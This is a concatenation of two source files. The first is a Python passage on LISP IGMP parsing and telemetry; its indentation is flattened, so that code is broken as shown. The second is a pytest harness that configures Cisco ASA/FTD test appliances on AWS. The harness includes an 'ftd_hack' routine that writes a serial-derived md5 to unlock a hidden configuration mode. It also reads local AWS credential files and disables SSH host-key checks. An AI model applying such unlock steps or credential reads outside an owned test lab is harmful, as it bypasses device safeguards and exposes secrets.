# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when the packet is an IGMP query and
# an array when it is a report. The caller must check whether there is
# context to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records).
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return the (S,G) entries to the caller so it can send a Map-Register.
# They are put in a Multicast Info LCAF Type with ourselves as an RLE.
# This is specified in RFC 8378.
#
return(register_entries)
#enddef
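#
# example_parse_igmpv3_report
#
# A self-contained sketch of walking an IGMPv3 report laid out as in the
# diagrams above. It takes the IGMP payload (no IP header) and returns plain
# (record-type, group, sources) tuples rather than the
# [source, group, joinleave] entries produced by lisp_process_igmp_packet().
#
def example_parse_igmpv3_report(igmp):
    import struct, socket
    if (len(igmp) < 8 or struct.unpack("!B", igmp[0:1])[0] != 0x22):
        return([])
    #endif
    record_count = struct.unpack("!H", igmp[6:8])[0]
    igmp = igmp[8::]
    records = []
    for i in range(record_count):
        if (len(igmp) < 8): break
        rtype, auxlen, scount, gaddr = struct.unpack("!BBHI", igmp[0:8])
        igmp = igmp[8::]
        group = socket.inet_ntoa(struct.pack("!I", gaddr))
        sources = []
        for j in range(scount):
            saddr = struct.unpack("!I", igmp[0:4])[0]
            sources.append(socket.inet_ntoa(struct.pack("!I", saddr)))
            igmp = igmp[4::]
        #endfor
        igmp = igmp[auxlen * 4::]
        records.append((rtype, group, sources))
    #endfor
    return(records)
#enddef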
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Add the RLOC to a new map-cache entry or update the RLOC for an existing entry.
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group?
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return a dictionary array if the json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
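#
# example_telemetry_roundtrip
#
# A small sketch of the telemetry JSON template handled by the functions
# above, filled with time.time() instead of lisp_get_timestamp(). The
# timestamp values are placeholders; only the key names come from the
# template shown in the comments above.
#
def example_telemetry_roundtrip():
    import json, time
    template = { "type" : "telemetry", "sub-type" : "timestamps",
        "itr-out" : "?", "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
    json_string = json.dumps(template)
    tel = json.loads(json_string)
    if (tel["itr-out"] == "?"): tel["itr-out"] = time.time()
    if (tel["etr-in"] == "?"): tel["etr-in"] = time.time()
    return(json.dumps(tel))
#enddef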
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#------------------------------------------------------------------------------
|
test_geneve.py
|
import os, sys
import re, hashlib, time
import atexit
from scapy.all import *
import pytest
from awsAPIv3 import aws
from lib_yijun import *
#pytest -v -s -m geneveASA --skip_updown --html=report.html --self-contained-html --metadata Version 9.17.0.20
def load_asa_config(asa_address, asa_jb_ip="20.0.250.10", debug=False):
import pexpect
# asa_address = "ssh -i 'testDog.pem' admin@3.142.241.180"
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
# conn.sendline("copy http://20.0.250.10/geneve.smp disk0:/.")
conn.sendline(f"copy http://{asa_jb_ip}/geneve.smp disk0:/.")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
conn.sendline("boot system disk0:/geneve.smp")
conn, result, cont = Geneve_reply(conn)
# if debug:
# print("~~~~~~Debug~~~~~~~")
# print('WAITED', wait(600))
# pytest.skip("Time to debug ASA error before reload")
conn.sendline("reload")
conn, result, cont = Geneve_reply(conn, debug=debug)
print('WAITED', wait(600))
conn.close()
del conn
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
# asa load pytest_day999.txt
Geneve_load(conn, "pytest_day999.txt")
conn.sendline("show run")
conn, result, cont = Geneve_reply(conn)
assert "20.0.1.101" in cont
def asa_config(asa_address, lines, debug=False) -> tuple:
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("conf term")
conn, result, cont = Geneve_reply(conn)
# for line in lines.splitlines():
# if line:
# conn.sendline(line)
# conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline(lines)
conn, result, cont = Geneve_reply(conn, debug=debug)
conn.close()
del conn
return result, cont
def ftd_hack(ftd_address, debug=False):
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn, debug=debug)  # first login, answer all password prompts
go2fxos(conn, debug=debug)
conn.sendline("configure manager delete")
conn, result, cont = Ocean_reply(conn, debug=debug)
time.sleep(5)
conn.sendline("configure manager add 20.0.250.13 cisco")
conn, result, cont = Ocean_reply(conn, debug=debug)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("show version")
conn, result, cont = Ocean_reply(conn, debug=debug)
p = "Serial Number: (.*)"
sn = re.compile(p).findall(cont)[0].strip()
if debug: print(sn)
go2expert(conn, debug=debug)
cli = f"sudo echo -n '1111222233334444{sn}' | md5sum>/mnt/disk0/enable_configure"
conn.sendline(cli)
conn, result, cont = Ocean_reply(conn, debug=debug)
if debug:
cli = "cat /mnt/disk0/enable_configure"
conn.sendline(cli)
conn, result, cont = Ocean_reply(conn, debug=debug)
print (cont)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
Ocean_reply(conn, debug=debug)
conn.sendline(f"debug menu file-system 7")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
Ocean_reply(conn, debug=debug)
conn.sendline(f"conf term")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("")
conn, result, cont = Ocean_reply(conn, debug=debug)
if "firepower(config)#" not in cont:
print("[Error][ftd_hack] failed to hack")
return
conn.sendline(f"end")
Ocean_reply(conn, debug=debug)
def ftd_config(ftd_address, lines, debug=False) -> tuple:
import pexpect
conn = None
while not conn:
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("system support diagnostic-cli")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("end")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("conf term")
conn, result, cont = Ocean_reply(conn, debug=debug)
for line in lines.splitlines():
if line:
conn.sendline(line)
conn, result, cont = Ocean_reply(conn, debug=debug)
conn.sendline("end")
Ocean_reply(conn, debug=debug)
conn.close()
del conn
return result, cont
def load_ftd_config(ftd_address, debug=False):
import pexpect
conn = pexpect.spawn(ftd_address)
conn, result, cont = Ocean_reply(conn,debug=debug)
go2ftd(conn, debug=debug)
conn.sendline("en")
conn, result, cont = Ocean_reply(conn,debug=debug)
conn.sendline("conf term")
conn, result, cont = Ocean_reply(conn,debug=debug)
Ocean_load(conn, "pytest_day999FTD.txt",debug=debug)
conn.sendline("show run")
conn, result, cont = Ocean_reply(conn,debug=debug)
assert "20.0.1.102" in cont
@pytest.fixture(scope="module", autouse=True)
def setup(request):
skip_updown = request.config.option.skip_updown
if skip_updown:
print("\nsetup/teardown: skipped")
return
global setting, aws_obj
setting = {}
with open("/Users/yijunzhu/.aws/config_auto", "r") as f:
cfg = f.read()
with open("/Users/yijunzhu/.aws/credentials_auto", "r") as f:
cda = f.read()
setting["config"] = cfg
setting["credentials"] = cda
with open("/Users/yijunzhu/.aws/config", "r") as f:
bytes_str = f.read().encode()
md5_default_config = hashlib.md5(bytes_str).digest()
with open("/Users/yijunzhu/.aws/credentials", "r") as f:
bytes_str = f.read().encode()
md5_default_credentials = hashlib.md5(bytes_str).digest()
debug = request.config.option.trs
aws_obj = aws(setting, debug=debug)
atexit.register(aws_obj.close)
aws_obj.load_deployment(fileName="aws_tb_pytest_west_1.config")
aws_obj.start_deployment()
Basic_miss_config()
asa_ip = aws_obj.fetch_address("Test-1-169-EC2-ASA")
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
load_asa_config(asa_address, debug=debug)
def teardown():
aws_obj.close()
with open("/Users/yijunzhu/.aws/config", "r") as f:
bytes_str = f.read().encode()
md5_default_config_v = hashlib.md5(bytes_str).digest()
with open("/Users/yijunzhu/.aws/credentials", "r") as f:
bytes_str = f.read().encode()
md5_default_credentials_v = hashlib.md5(bytes_str).digest()
assert md5_default_config == md5_default_config_v
assert md5_default_credentials == md5_default_credentials_v
request.addfinalizer(teardown)
def Basic_miss_config():
print("####Basic_miss_config test####")
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run()
cmd1 = "sudo ifconfig eth1 down"
cmd2 = "sudo ifconfig eth1 10.0.1.10/24"
cmd3 = "sudo ifconfig eth1 up"
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh.exec_command(f"{cmd1};{cmd2};{cmd3}")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh2.exec_command(f"{cmd1};{cmd2};{cmd3}")
stdout.channel.recv_exit_status()
ssh.close()
ssh2.close()
#~~~~~~~~~~
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# jb_ip = aws_obj.fetch_address("Test-1-169-EC2-App-JB")
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "100% packet loss" in resp1
ssh.close()
# @pytest.fixture(scope="module", params=["mod1", "mod2"])
# def sss():
# print("~~~~~sss~~~~~")
#
# @pytest.mark.shit
# def test_shit(sss):
# print("\nshit")
#
# @pytest.mark.shit
# def test_shit2():
# print("shit2")
@pytest.mark.clusterConfig
def test_cluster_config(local_asa):
asa_dict = local_asa
print(asa_dict)
key = "testCat.pem"
asa_jb_ip = "30.0.250.20"
job_list = []
from multiprocessing import Process
timer_start = time.time()
for name, ip in asa_dict.items():
asa_address = f"ssh -i '{key}' admin@{ip}"
name = name.replace("#", "-")
timer_p = Process(target=load_asa_config_multi, args=(asa_address, name, asa_jb_ip))
timer_p.start()
job_list.append(timer_p)
for job in job_list:
job.join()
job.close()
end = time.time() - timer_start
print("Info: time cost == ", end)
#Load config
#TBD
@pytest.mark.geneveASA
@pytest.mark.basic1to2
def test_Basic_PingGoogle(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 1'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert " 0% packet loss" in resp1
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.basic2to1
def test_Basic_PingApp(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
access_list = f"access-list geneve extended permit icmp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, access_list)
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command(f"ping {app_ip} -c 1")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert " 0% packet loss" in resp1
no_access_list = f"no access-list geneve extended permit icmp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_access_list)
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.install1to2
def test_apt_install_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install net-tools'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ifconfig'")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "10.0.1.101" in resp2
ssh.close()
@pytest.mark.geneveASA
@pytest.mark.install2to1
def test_apt_install_from_inside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
access_list = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, access_list)
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt update'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install iperf -y'")
stdout.channel.recv_exit_status()
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'sudo apt install apache2 -y'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
while True:
_, stdout2, _ = ssh.exec_command(f"wget http://{app_ip}/index.html; ls index.html")
stdout2.channel.recv_exit_status()
resp2 = "".join(stdout2.readlines())
if not resp2:
continue
else:
break
assert "No such file or directory" not in resp2
no_access_list = f"no access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, no_access_list)
ssh.close()
@pytest.mark.pyserver
def test_PYSERVER(skip_updown):
print("skip_updown:", skip_updown)
# asa_jb_address = "ssh -i 'testDog.pem' ubuntu@54.219.169.240"
# asa_address = "ssh -i 'testDog.pem' ubuntu@54.241.122.28"
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.57.178.96:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@13.57.178.96 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.52.150.43:/home/ubuntu/.'"
os.popen(cmd2).read()
cmd3 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@13.57.48.179:/home/ubuntu/."
os.popen(cmd3).read()
# 2. run server file
# cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
# "ubuntu@54.219.169.240 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
# "ubuntu@54.241.122.28 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
# os.popen(cmd3).read()
@pytest.mark.geneveASA
@pytest.mark.tcp
@pytest.mark.tcp1to2
def test_TCP23_from_outside(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, _, _ = local_run
asa_address = f"ssh -i 'testDog.pem' admin@{asa_ip}"
acl_config = f"access-list geneve extended permit tcp host {app_jb_ip} host 10.0.1.101"
asa_config(asa_address, acl_config)
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
